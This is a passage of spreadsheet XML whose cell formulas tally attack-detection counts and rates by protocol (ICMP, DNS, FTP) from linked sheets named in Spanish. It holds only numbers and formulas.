      <c r="BQ17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="BR17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="BS17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="BT17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="BU17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="BV17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="BW17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="BX17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="BY17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="BZ17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="CA17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="CB17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="CC17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="CD17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="CE17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="CF17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="CG17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="CH17" s="448">
        <f t="shared" si="15"/>
        <v>0.00261243336</v>
      </c>
      <c r="CI17" s="448">
        <f t="shared" si="15"/>
        <v>0.005988023952</v>
      </c>
      <c r="CJ17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="CK17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="CL17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="CM17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="CN17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="CO17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="CP17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="CQ17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="CR17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="CS17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="CT17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="CU17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="CV17" s="448" t="str">
        <f t="shared" si="15"/>
        <v>-</v>
      </c>
      <c r="CW17" s="448">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="CX17" s="448">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="CY17" s="648">
        <f t="shared" si="15"/>
        <v>0.2727272727</v>
      </c>
      <c r="CZ17" s="336"/>
      <c r="DA17" s="336"/>
      <c r="DB17" s="336"/>
      <c r="DC17" s="649" t="s">
        <v>209</v>
      </c>
      <c r="DD17" s="639">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GV$3:$GV$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DC17,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>6</v>
      </c>
      <c r="DE17" s="618">
        <v>6.0</v>
      </c>
      <c r="DF17" s="336">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="DG17" s="173">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="DH17" s="337">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DI17" s="607">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="DJ17" s="608">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="DK17" s="609">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="DL17" s="455">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DM17" s="610"/>
      <c r="DN17" s="610"/>
      <c r="DO17" s="619" t="s">
        <v>209</v>
      </c>
      <c r="DP17" s="620">
        <f>DD17/'(D) - Análisis Resultados I - S'!EB36</f>
        <v>0.6666666667</v>
      </c>
      <c r="DQ17" s="336"/>
      <c r="DR17" s="619" t="s">
        <v>209</v>
      </c>
      <c r="DS17" s="620">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="DT17" s="336"/>
      <c r="DU17" s="336"/>
      <c r="DV17" s="336"/>
      <c r="DW17" s="336"/>
      <c r="DX17" s="336"/>
      <c r="DY17" s="336"/>
      <c r="DZ17" s="336"/>
      <c r="EC17" s="636" t="s">
        <v>633</v>
      </c>
      <c r="ED17" s="637">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC17,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC17  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC17,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC17  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.6666666667</v>
      </c>
      <c r="EE17" s="336">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC17,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC17  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC17,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC17  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0</v>
      </c>
      <c r="EF17" s="561" t="s">
        <v>12</v>
      </c>
      <c r="EG17" s="629" t="s">
        <v>12</v>
      </c>
      <c r="EH17" s="336"/>
      <c r="EI17" s="336"/>
      <c r="EJ17" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ9&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ9*'(B) - Detecciones - Ataques'!HN9/('(B) - Detecciones - Ataques'!HN9+'(B) - Detecciones - Ataques'!HO9),0)</f>
        <v>0</v>
      </c>
      <c r="EK17" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ9&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ9*'(B) - Detecciones - Ataques'!HO9/('(B) - Detecciones - Ataques'!HN9+'(B) - Detecciones - Ataques'!HO9),0)</f>
        <v>0</v>
      </c>
      <c r="EL17" s="336"/>
      <c r="EM17" s="615"/>
      <c r="EN17" s="336"/>
      <c r="EO17" s="379" t="s">
        <v>427</v>
      </c>
      <c r="EP17" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EO17)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO17 &amp; "*")</f>
        <v>3</v>
      </c>
      <c r="EQ17" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,EO17)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO17 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="ER17" s="623">
        <f t="shared" si="13"/>
        <v>0.6</v>
      </c>
      <c r="ES17" s="401"/>
      <c r="ET17" s="402"/>
      <c r="EV17" s="336"/>
      <c r="EW17" s="20" t="s">
        <v>2672</v>
      </c>
      <c r="EX17" s="336">
        <f>1-EX14</f>
        <v>0.9918833009</v>
      </c>
      <c r="EY17" s="336"/>
      <c r="EZ17" s="336"/>
      <c r="FA17" s="336"/>
      <c r="FB17" s="336"/>
      <c r="FC17" s="336"/>
      <c r="FD17" s="336"/>
      <c r="FE17" s="336"/>
      <c r="FF17" s="336"/>
      <c r="FG17" s="336"/>
      <c r="FH17" s="336"/>
      <c r="FI17" s="336"/>
      <c r="FJ17" s="336"/>
      <c r="FK17" s="336"/>
      <c r="FN17" s="336" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"ICMP")</f>
        <v>ICMP</v>
      </c>
      <c r="FO17" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN17)</f>
        <v>0</v>
      </c>
      <c r="FP17" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN17)</f>
        <v>0</v>
      </c>
      <c r="FQ17" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN17)</f>
        <v>0</v>
      </c>
      <c r="FR17" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN17)</f>
        <v>2</v>
      </c>
      <c r="FS17" s="336"/>
      <c r="FT17" s="336"/>
      <c r="FU17" s="336"/>
      <c r="FV17" s="336"/>
      <c r="FW17" s="336"/>
      <c r="FX17" s="336"/>
    </row>
    <row r="18">
      <c r="D18" s="173"/>
      <c r="E18" s="173"/>
      <c r="DC18" s="616" t="s">
        <v>664</v>
      </c>
      <c r="DD18" s="617">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GV$3:$GV$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DC18,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>2</v>
      </c>
      <c r="DE18" s="618">
        <v>2.0</v>
      </c>
      <c r="DF18" s="561" t="s">
        <v>12</v>
      </c>
      <c r="DG18" s="173">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="DH18" s="629" t="s">
        <v>12</v>
      </c>
      <c r="DI18" s="607">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="DJ18" s="608" t="s">
        <v>12</v>
      </c>
      <c r="DK18" s="609">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="DL18" s="455" t="s">
        <v>12</v>
      </c>
      <c r="DM18" s="610"/>
      <c r="DN18" s="610"/>
      <c r="DO18" s="619" t="s">
        <v>664</v>
      </c>
      <c r="DP18" s="620">
        <f>DD18/'(D) - Análisis Resultados I - S'!EB37</f>
        <v>0.3333333333</v>
      </c>
      <c r="DR18" s="619" t="s">
        <v>664</v>
      </c>
      <c r="DS18" s="620">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="DW18" s="650" t="s">
        <v>2673</v>
      </c>
      <c r="DX18" s="289"/>
      <c r="DY18" s="289"/>
      <c r="DZ18" s="290"/>
      <c r="EC18" s="636" t="s">
        <v>244</v>
      </c>
      <c r="ED18" s="637">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC18,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC18  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC18,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC18  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.5714285714</v>
      </c>
      <c r="EE18" s="336">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC18,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC18  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC18,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC18  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.1428571429</v>
      </c>
      <c r="EF18" s="561" t="s">
        <v>12</v>
      </c>
      <c r="EG18" s="629" t="s">
        <v>12</v>
      </c>
      <c r="EJ18" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ10&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ10*'(B) - Detecciones - Ataques'!HN10/('(B) - Detecciones - Ataques'!HN10+'(B) - Detecciones - Ataques'!HO10),0)</f>
        <v>0</v>
      </c>
      <c r="EK18" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ10&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ10*'(B) - Detecciones - Ataques'!HO10/('(B) - Detecciones - Ataques'!HN10+'(B) - Detecciones - Ataques'!HO10),0)</f>
        <v>1</v>
      </c>
      <c r="EM18" s="651"/>
      <c r="EO18" s="379" t="s">
        <v>1373</v>
      </c>
      <c r="EP18" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EO18)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO18 &amp; "*")</f>
        <v>7</v>
      </c>
      <c r="EQ18" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,EO18)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO18 &amp; "*")</f>
        <v>19</v>
      </c>
      <c r="ER18" s="623">
        <f t="shared" si="13"/>
        <v>0.3684210526</v>
      </c>
      <c r="ES18" s="401"/>
      <c r="ET18" s="402"/>
      <c r="FN18" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DNS")</f>
        <v>DNS</v>
      </c>
      <c r="FO18" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN18)</f>
        <v>0.5</v>
      </c>
      <c r="FP18" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN18)</f>
        <v>0.5000483185</v>
      </c>
      <c r="FQ18" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN18)</f>
        <v>0.75</v>
      </c>
      <c r="FR18" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN18)</f>
        <v>4</v>
      </c>
    </row>
    <row r="19">
      <c r="D19" s="288" t="s">
        <v>2550</v>
      </c>
      <c r="E19" s="290"/>
      <c r="DC19" s="616" t="s">
        <v>357</v>
      </c>
      <c r="DD19" s="617">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GV$3:$GV$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DC19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>5</v>
      </c>
      <c r="DE19" s="617">
        <v>5.0</v>
      </c>
      <c r="DF19" s="336">
        <f t="shared" ref="DF19:DF20" si="20">DE19/DD19</f>
        <v>1</v>
      </c>
      <c r="DG19" s="173">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="DH19" s="337">
        <f t="shared" ref="DH19:DH20" si="21">1-DF19</f>
        <v>0</v>
      </c>
      <c r="DI19" s="607">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="DJ19" s="608">
        <f t="shared" ref="DJ19:DJ20" si="22">DI19/DD19</f>
        <v>1</v>
      </c>
      <c r="DK19" s="609">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="DL19" s="455">
        <f t="shared" ref="DL19:DL20" si="23">DK19/DD19</f>
        <v>0</v>
      </c>
      <c r="DM19" s="610"/>
      <c r="DN19" s="610"/>
      <c r="DO19" s="619" t="s">
        <v>357</v>
      </c>
      <c r="DP19" s="620">
        <f>DD19/'(D) - Análisis Resultados I - S'!EB38</f>
        <v>1</v>
      </c>
      <c r="DR19" s="619" t="s">
        <v>357</v>
      </c>
      <c r="DS19" s="620">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="DW19" s="652"/>
      <c r="DY19" s="653" t="s">
        <v>2674</v>
      </c>
      <c r="DZ19" s="654" t="s">
        <v>2675</v>
      </c>
      <c r="EC19" s="655" t="s">
        <v>427</v>
      </c>
      <c r="ED19" s="637">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0</v>
      </c>
      <c r="EE19" s="336">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0</v>
      </c>
      <c r="EF19" s="336">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.3333333333</v>
      </c>
      <c r="EG19" s="337">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.6666666667</v>
      </c>
      <c r="EJ19" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ11&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ11*'(B) - Detecciones - Ataques'!HN11/('(B) - Detecciones - Ataques'!HN11+'(B) - Detecciones - Ataques'!HO11),0)</f>
        <v>0</v>
      </c>
      <c r="EK19" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ11&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ11*'(B) - Detecciones - Ataques'!HO11/('(B) - Detecciones - Ataques'!HN11+'(B) - Detecciones - Ataques'!HO11),0)</f>
        <v>0</v>
      </c>
      <c r="EM19" s="571"/>
      <c r="EO19" s="379" t="s">
        <v>209</v>
      </c>
      <c r="EP19" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EO19)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO19 &amp; "*")</f>
        <v>8</v>
      </c>
      <c r="EQ19" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,EO19)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO19 &amp; "*")</f>
        <v>13</v>
      </c>
      <c r="ER19" s="623">
        <f t="shared" si="13"/>
        <v>0.6153846154</v>
      </c>
      <c r="ES19" s="401"/>
      <c r="ET19" s="402"/>
      <c r="FN19" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"FTP")</f>
        <v>FTP</v>
      </c>
      <c r="FO19" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN19)</f>
        <v>0.6666666667</v>
      </c>
      <c r="FP19" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN19)</f>
        <v>0.8333333333</v>
      </c>
      <c r="FQ19" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN19)</f>
        <v>1</v>
      </c>
      <c r="FR19" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN19)</f>
        <v>3</v>
      </c>
    </row>
    <row r="20">
      <c r="D20" s="340" t="s">
        <v>2676</v>
      </c>
      <c r="E20" s="341" t="s">
        <v>2671</v>
      </c>
      <c r="G20" s="291" t="s">
        <v>2677</v>
      </c>
      <c r="H20" s="292"/>
      <c r="I20" s="292"/>
      <c r="J20" s="292"/>
      <c r="K20" s="292"/>
      <c r="L20" s="292"/>
      <c r="M20" s="292"/>
      <c r="N20" s="292"/>
      <c r="O20" s="292"/>
      <c r="P20" s="292"/>
      <c r="Q20" s="292"/>
      <c r="R20" s="292"/>
      <c r="S20" s="292"/>
      <c r="T20" s="292"/>
      <c r="U20" s="293"/>
      <c r="W20" s="294" t="s">
        <v>2678</v>
      </c>
      <c r="X20" s="292"/>
      <c r="Y20" s="292"/>
      <c r="Z20" s="292"/>
      <c r="AA20" s="292"/>
      <c r="AB20" s="292"/>
      <c r="AC20" s="292"/>
      <c r="AD20" s="292"/>
      <c r="AE20" s="292"/>
      <c r="AF20" s="292"/>
      <c r="AG20" s="292"/>
      <c r="AH20" s="292"/>
      <c r="AI20" s="292"/>
      <c r="AJ20" s="292"/>
      <c r="AK20" s="292"/>
      <c r="AL20" s="292"/>
      <c r="AM20" s="292"/>
      <c r="AN20" s="292"/>
      <c r="AO20" s="292"/>
      <c r="AP20" s="292"/>
      <c r="AQ20" s="292"/>
      <c r="AR20" s="292"/>
      <c r="AS20" s="292"/>
      <c r="AT20" s="292"/>
      <c r="AU20" s="292"/>
      <c r="AV20" s="292"/>
      <c r="AW20" s="292"/>
      <c r="AX20" s="292"/>
      <c r="AY20" s="292"/>
      <c r="AZ20" s="292"/>
      <c r="BA20" s="292"/>
      <c r="BB20" s="292"/>
      <c r="BC20" s="292"/>
      <c r="BD20" s="292"/>
      <c r="BE20" s="292"/>
      <c r="BF20" s="292"/>
      <c r="BG20" s="292"/>
      <c r="BH20" s="292"/>
      <c r="BI20" s="292"/>
      <c r="BJ20" s="292"/>
      <c r="BK20" s="292"/>
      <c r="BL20" s="292"/>
      <c r="BM20" s="292"/>
      <c r="BN20" s="292"/>
      <c r="BO20" s="292"/>
      <c r="BP20" s="292"/>
      <c r="BQ20" s="292"/>
      <c r="BR20" s="292"/>
      <c r="BS20" s="292"/>
      <c r="BT20" s="292"/>
      <c r="BU20" s="292"/>
      <c r="BV20" s="292"/>
      <c r="BW20" s="292"/>
      <c r="BX20" s="292"/>
      <c r="BY20" s="292"/>
      <c r="BZ20" s="292"/>
      <c r="CA20" s="292"/>
      <c r="CB20" s="292"/>
      <c r="CC20" s="292"/>
      <c r="CD20" s="292"/>
      <c r="CE20" s="292"/>
      <c r="CF20" s="292"/>
      <c r="CG20" s="292"/>
      <c r="CH20" s="292"/>
      <c r="CI20" s="292"/>
      <c r="CJ20" s="292"/>
